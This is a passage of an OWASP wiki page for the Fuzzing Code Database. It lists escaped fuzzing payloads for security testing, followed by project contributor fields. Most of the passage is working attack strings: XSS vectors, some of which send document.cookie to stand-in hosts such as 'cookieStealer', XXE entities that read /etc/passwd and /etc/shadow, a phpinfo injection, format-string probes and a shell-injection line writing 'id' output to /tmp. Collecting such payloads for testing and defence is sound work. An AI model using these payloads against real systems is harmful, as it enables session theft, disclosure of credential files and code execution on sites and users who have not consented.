&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
